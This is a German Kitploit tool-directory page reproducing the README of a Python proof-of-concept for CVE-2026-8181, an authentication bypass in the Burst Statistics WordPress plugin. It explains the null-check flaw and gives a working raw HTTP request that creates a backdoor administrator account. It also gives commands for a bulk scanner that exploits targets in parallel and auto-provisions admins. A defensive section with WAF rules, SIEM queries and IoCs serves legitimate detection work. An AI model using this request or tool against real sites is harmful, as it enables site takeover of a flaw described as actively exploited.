Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-8181-PoC — Python PoC für CVE-2026-8181, einen kritischen Authentifizierungs-Bypass im Burst Statistics WordPress-Plugin. Beinhaltet Exploit-Automatisierung, Massenscan und Erstellung von Administratorkonten für autorisierte Sicherheitstests. | Kitploit
Tools/GitHubGitHub/squamity/cve-2026-8181-poc
DefensivwerkzeugeSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungLernen & BildungRed Teaming
GitHubsquamity/cve-2026-8181-poc

CVE-2026-8181-PoC

Python PoC für CVE-2026-8181, einen kritischen Authentifizierungs-Bypass im Burst Statistics WordPress-Plugin. Beinhaltet Exploit-Automatisierung, Massenscan und Erstellung von Administratorkonten für autorisierte Sicherheitstests.

vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

🚨 CVE-2026-8181 | Burst Statistics Authentifizierungsumgehung

CVE-2026-8181 CVSS WordPress Plugin Affected Versions Actively Exploited

[!CAUTION] KRITISCHER HINWEIS: Diese Schwachstelle ermöglicht es einem nicht authentifizierten entfernten Angreifer, die Authentifizierung zu umgehen und volle Administratorrechte auf der Ziel-WordPress-Seite zu erlangen, indem er lediglich einen benutzerdefinierten HTTP-Header injiziert. Diese CVE wird derzeit aktiv in freier Wildbahn ausgenutzt.


📑 Inhaltsverzeichnis

  1. Zusammenfassung
  2. 🔬 Tiefgehende Analyse: Ursachenanalyse
  3. ⚔️ Offensives Playbook: Ausnutzung
  4. 🛡️ Defensives Playbook: Erkennung & Abwehr
  5. 🛠️ PoC-Tool-Nutzung
  6. Referenzen & Haftungsausschluss

📖 Zusammenfassung

CVE-2026-8181 ist eine kritische Authentifizierungsumgehung-Schwachstelle, die das Burst Statistics WordPress-Plugin (Versionen 3.4.0 bis 3.4.1.1) betrifft. Der Fehler liegt in der MainWP-Proxy-Integration des Plugins. Aufgrund einer unzureichenden Validierung von Anwendungspasswörtern während des frühen plugins_loaded-Hooks gewährt das Plugin fälschlicherweise Administratorkontext für REST-API-Anfragen, die den X-BurstMainWP: 1-Header enthalten, selbst wenn die Anfrage keine gültigen Anmeldedaten enthält.

Dadurch wird eine einfache, nicht authentifizierte HTTP-Anfrage in eine vollständige administrative Übernahme umgewandelt, die alle Standard-WordPress-Authentifizierungsmechanismen umgeht.


🔬 Tiefgehende Analyse: Ursachenanalyse

Um zu verstehen, wie ein einfacher Header die Schlüssel zum Königreich gewährt, müssen wir die PHP-Logik im Authentifizierungs-Handler des Plugins analysieren.

Der anfällige Logikablauf

Die Schwachstelle resultiert aus einem fehlerhaft behandelten bedingten Zweig in includes/Frontend/class-mainwp-proxy.php innerhalb der Methode is_mainwp_authenticated().

  1. Der Auslöser: Das Plugin registriert init() auf plugins_loaded mit Priorität 9. Dies ist zu früh im WordPress-Lebenszyklus.
  2. Der Hook: Wenn eine Anfrage den Header X-BurstMainWP: 1 trägt, delegiert has_admin_access() die Authentifizierung an is_mainwp_authenticated().
  3. Der Kernaufruf: Die Methode liest den Authorization-Header und leitet die Anmeldedaten an die WordPress-Kernfunktion wp_authenticate_application_password() weiter.
  4. Der fatale Fehler (CWE-287): Da die REST-API den Filter application_password_is_api_request noch nicht auf true gesetzt hat (aufgrund der frühen Hook-Ausführung), gibt die Kernfunktion null statt eines WP_Error-Objekts zurück.

Pseudo-Code-Darstellung

root@kitploit:~
// Simplified representation of the vulnerable code in Burst Statistics <= 3.4.1.1
$user = wp_authenticate_application_password( null, $username, $password );

if ( is_wp_error( $user ) ) {
    return false; // Correctly handles explicit authentication failures
}

// 🚨 THE FATAL FLAW 🚨
// If no application password is provided or API request isn't flagged yet,
// wp_authenticate_application_password returns NULL.
// The code fails to check for NULL!
if ( $user === null ) {
    // Instead of failing securely, it falls through to this unsafe branch:
    $admin_user = get_user_by( 'login', $attacker_supplied_username );
    wp_set_current_user( $admin_user->ID ); // BOOM: Admin context granted!
    return true;
}

⚔️ Offensives Playbook: Ausnutzung

Dieser Abschnitt ist für Red Teamer und autorisierte Penetrationstester.

Die Angriffskette

  1. Aufklärung: Identifizieren, dass das Ziel Burst Statistics <= 3.4.1.1 ausführt (z. B. über /wp-content/plugins/burst-statistics/readme.txt).
  2. Benutzer-Ermittlung: Finden eines gültigen Administrator-Benutzernamens. Die WordPress-REST-API gibt diese oft über GET /wp-json/wp/v2/users preis. Falls blockiert, den Author-Archive-Trick verwenden: /?author=1.
  3. Payload-Konstruktion: Erstellen einer HTTP-POST-Anfrage zum Anlegen eines neuen Benutzers: POST /wp-json/wp/v2/users.
  4. Header-Injektion: Injizieren der magischen Header:
    • X-BurstMainWP: 1
    • Authorization: Basic <base64(admin_username:fake_password)>
  5. Ausführung: Der Server verarbeitet die Anfrage, trifft auf die fehlerhafte null-Prüfung und stuft die Anfrage auf Administratorkontext hoch. Der neue Admin-Benutzer wird erstellt.

Beispiel einer rohen HTTP-Anfrage

root@kitploit:~
POST /wp-json/wp/v2/users HTTP/1.1
Host: target.com
X-BurstMainWP: 1
Authorization: Basic YWRtaW46ZmFrZV9wYXNzd29yZA==
Content-Type: application/json

{
  "username": "backdoor_admin",
  "password": "SuperSecretPassword123!",
  "email": "[email protected]",
  "roles": ["administrator"]
}

[!IMPORTANT] Umgebungshinweis: Dieser Exploit erfordert, dass der Authorization-Header PHP erreicht.

  • Nginx / LiteSpeed / Apache mit Pretty Permalinks: Der Header wird weitergeleitet. Exploit ERFOLGREICH.
  • Apache mit Plain Permalinks (Standard): Der Header wird vom Webserver stillschweigend entfernt. Exploit FEHLGESCHLAGEN.

🛡️ Defensives Playbook: Erkennung & Abwehr

Dieser Abschnitt ist für Blue Teamer, SOC-Analysten und Systemadministratoren.

🕵️ Erkennungsstrategien

1. Web Application Firewall (WAF)-Regeln

Den spezifischen Header am Edge blockieren oder überwachen.

ModSecurity / OWASP CRS-Regel:

root@kitploit:~
SecRule REQUEST_HEADERS:X-BurstMainWP "@streq 1" \
    "id:1000001, \
    phase:1, \
    deny, \
    status:403, \
    log, \
    msg:'CVE-2026-8181: Burst Statistics Auth Bypass Attempt', \
    tag:'CVE-2026-8181', \
    severity:'CRITICAL'"

Cloudflare WAF-Benutzerdefinierte Regel:

(http.request.headers["X-BurstMainWP"] eq "1")


2. Protokollanalyse & SIEM-Abfragen

Durchsuchen Sie Ihre Webserver-Logs nach dem Vorhandensein des Headers in Kombination mit der REST-API-Benutzererstellung.

Splunk / ELK-Abfrage:

root@kitploit:~
index=web_logs ("X-BurstMainWP"="1" OR "x-burstmainwp"="1") AND uri="/wp-json/wp/v2/users" AND method="POST"
| stats count by src_ip, uri
| where count > 0

3. Indikatoren für Kompromittierung (IoCs)

Wenn Sie einen Einbruch vermuten, suchen Sie nach diesen Artefakten nach der Ausnutzung:

  • Neue Administratoren: Überprüfen Sie die wp_users-Tabelle auf Benutzer, die über die REST-API mit der Rolle administrator erstellt wurden.
  • Verdächtige Plugins: Überprüfen Sie wp-content/plugins/ auf nicht autorisierte Uploads (oft Webshells, die als legitime Plugins getarnt sind).
  • Modifizierte Dateien: Überprüfen Sie wp-content/themes/ oder Kern-Dateien auf nicht autorisierte Änderungen.

🛡️ Eindämmung & Behebung

[!IMPORTANT] Sofortige Maßnahme erforderlich: Wenn Sie eine anfällige Version betreiben, wenden Sie sofort eine der folgenden Gegenmaßnahmen an.


🛠️ PoC-Tool-Nutzung

Dieses Repository enthält CVE-2026-8181.py, ein Python-Automatisierungstool zur Überprüfung der Schwachstelle in autorisierten Laborumgebungen.

Funktionen


Schnellstart

root@kitploit:~
# 1. Install dependencies
pip3 install requests urllib3

# 2. Single Site Recon & Auto-Provision New Admin
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o report.txt -k

# 3. Bulk Scan with Combined Success File
python3 CVE-2026-8181.py -f targets.txt -j 20 -o successes.txt -k

# 4. Bulk Scan with Individual Host Reports
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k

📚 Referenzen & Danksagungen

  • Originalentdeckung: Chloe Chamberland & PRISM (Wordfence Threat Intelligence)
  • CVE-Eintrag: MITRE CVE-2026-8181
  • NVD-Detail: NIST NVD
  • Plugin-Verzeichnis: Burst Statistics

⚖️ Haftungsausschluss

[!WARNING] NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE TESTS.

Die in diesem Repository bereitgestellten Informationen dienen ausschließlich Bildungszwecken, Sicherheitsforschung und autorisierten Penetrationstests. Das Ausnutzen von Schwachstellen gegen Systeme ohne ausdrückliche schriftliche Genehmigung des Systemeigentümers ist illegal und verstößt gegen internationale Cybergesetze.

Die Autoren und Mitwirkenden dieses Repositorys übernehmen keine Haftung und sind nicht verantwortlich für Missbrauch, Schäden oder rechtliche Konsequenzen, die sich aus der Nutzung dieses Tools oder dieser Informationen ergeben. Hacken Sie stets verantwortungsvoll und ethisch.


Erstellt mit ❤️ von Squamity | Gepflegt für defensive & offensive Bildung
Tool herunterladen
  • Die Umgehung: Das Plugin prüft nur mit is_wp_error( $user ). Da null kein WP_Error ist, wird die Sicherheitsabfrage passiert.
  • Die Übernahme: Der Code fällt in einen unsicheren Zweig, ruft wp_set_current_user() mit einem angreifergesteuerten Benutzernamen auf und hebt die Anfrage sofort auf vollen Administratorkontext.
  • PrioritätMaßnahmeDetails
    P0Plugin patchenAktualisieren Sie Burst Statistics auf Version 3.4.2 oder höher sofort über das WordPress-Dashboard.
    P1WAF-Virtuelles PatchenFalls Sie nicht sofort patchen können, setzen Sie die WAF-Regeln (oben) ein, um den X-BurstMainWP-Header zu blockieren.
    P2Benutzer-Ermittlung einschränkenVerwenden Sie ein Sicherheits-Plugin oder .htaccess-Regeln, um den öffentlichen Zugriff auf /wp-json/wp/v2/users und /?author=* zu blockieren.
    P3Benutzer & Dateien prüfenFühren Sie ein Skript aus, um kürzlich erstellte Administrator-Konten zu überprüfen und nicht autorisierte Zugriffe zu widerrufen. Scannen Sie nach Webshells.
    FunktionBeschreibung
    🎯 EinzelzielScannen einer bestimmten Website mit dem -u-Flag.
    📦 Batch-BetriebEinspeisen einer Liste von Zielen über -f targets.txt (unterstützt # für Kommentare).
    ⚡ ParallelitätBeschleunigen von Batch-Scans mit Threaded Workern (-j N).
    💾 Intelligente Ausgabe-o file.txt für einen kombinierten Bericht. Im Batch-Modus werden nur erfolgreiche Exploits protokolliert.
    📂 Pro-Host-DumpsVerwenden Sie --output-dir, um einzelne .txt-Dateien für jeden kompromittierten Host zu speichern.
    👤 Admin-ErstellungÜbergeben Sie --create-user, um automatisch ein neues Administrator-Konto über die REST-API bereitzustellen.
    🔓 Labor-TLSVerwenden Sie -k, um SSL-Zertifikatsfehler zu ignorieren (streng genommen nur für lokale/vertrauenswürdige Laborumgebungen).